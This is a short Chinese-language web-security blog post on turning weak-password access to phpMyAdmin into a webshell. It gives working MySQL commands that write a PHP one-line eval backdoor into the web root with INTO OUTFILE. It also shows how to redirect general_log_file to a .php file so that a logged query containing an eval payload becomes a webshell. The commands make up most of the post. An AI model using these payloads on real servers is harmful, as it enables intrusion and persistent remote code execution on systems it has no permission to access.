【Web安全】拿到phpMyAdmin如何获取权限

文章目录

通过弱口令拿到进到phpMyAdmin页面如何才能获取权限

1、outfile写一句话

尝试执行outfile语句写入一句话木马

mysql 复制代码
select "<?php @eval($_REQUEST[6868])?>"  into outfile "C:\\phpStudy\\WWW\\phpadmin.php";

如果执行失败show variables like "%secure%"; 查看配置

2、general_log_file写一句话

查看general_log是否开启

通过show global variables like "%genera%";查看

执行set global general_log="on";打开

通过generali_log_file写入一句话木马

复制代码
set global general_log_file="网站绝对路径/文件名";
mysql 复制代码
SELECT "<?php @eval($_POST[1])?>"

general_log_file会记录所有的查询语句,以原始的状态来显示,如果将general_log开关打开,general_log_file设置为一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,通过访问general_log_file指定的文件来获取webshell。

相关推荐
ZHOUPUYU3 小时前
PHP 8.2 的核心高级特性,包括只读类、类型系统增强
android·性能优化·php
ZHOUPUYU4 小时前
PHP 8.0 高级技术实战:从新特性到性能优化
android·性能优化·php
花 满 楼4 小时前
HSM自学之路——阶段5安全启动专题与实践
安全·嵌入式·汽车电子·hsm·安全启动
不爱说话郭德纲4 小时前
从“点点点”到一键出包:我把 uni-app x Android 离线打包做成了脚本
android·前端·uni-app
三8444 小时前
Fastjson 漏洞· 06 · 防御、审计与检测
安全·web安全·fastjson
事圆则缓4 小时前
Android 崩溃优化与应用稳定性全解析:Crash、ANR、OOM 到线上治理
android
ZHOUPUYU5 小时前
PHP 高级技术实战:从原理到高并发架构落地
android·性能优化·php
qetfw5 小时前
Debian SSH 安全配置:端口、来源限制与免密登录
linux·安全·debian·ssh
stevenzqzq5 小时前
mvi的理解
android·compose
脚踏实地,坚持不懈!5 小时前
Android 电池健康度检测全流程(驱动 → 内核 → HAL → Framework)
android·linux